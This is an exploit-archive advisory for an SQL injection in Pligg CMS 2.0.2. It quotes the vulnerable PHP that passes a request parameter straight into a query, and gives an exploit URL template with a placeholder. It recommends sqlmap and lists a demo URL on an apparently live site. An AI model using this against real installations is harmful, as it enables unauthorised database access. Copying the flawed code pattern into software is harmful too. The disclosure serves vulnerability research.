Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection Vulnerability

# Exploit Title: Pligg CMS 2.0.2 SQL injection
# Date: 29-08-2015
# Exploit Author: jsass
# Vendor Homepage: http://pligg.com
# Software Link: https://github.com/Pligg/pligg-cms/archive/2.0.2.zip
# Version: 2.0.2
# Tested on: kali sana 2.0
 
################ Q8 Gray Hat Team ################
 
 
 
SQLInjection
 
File : load_data_for_search.php
 
 
 $search = new Search();
     
    if(isset($_REQUEST['start_up']) and $_REQUEST['start_up']!= '' and $_REQUEST['pagesize'] != ''){
         
        $pagesize = $_REQUEST['pagesize'];
        $start_up = $_REQUEST['start_up'];
        $limit = " LIMIT $start_up, $pagesize"; 
    }
    if(isset($_REQUEST['sql']) and $_REQUEST['sql']!= ''){
        $sql = $_REQUEST['sql'];
        $search->sql = $sql.$limit;
    }
     
    $fetch_link_summary = true;
    $linksum_sql = $sql.$limit;
 
Exploit : http://localhost/pligg-cms-master/load_data_for_search.php?sql={SQLi}
 
Type Injection : Boolean & Time Based 
 
Use SQLmap To Inject ..
 
Demo : http://www.pligg.science/load_data_for_search.php?sql={SQLi}

#  0day.today [2018-01-01]  #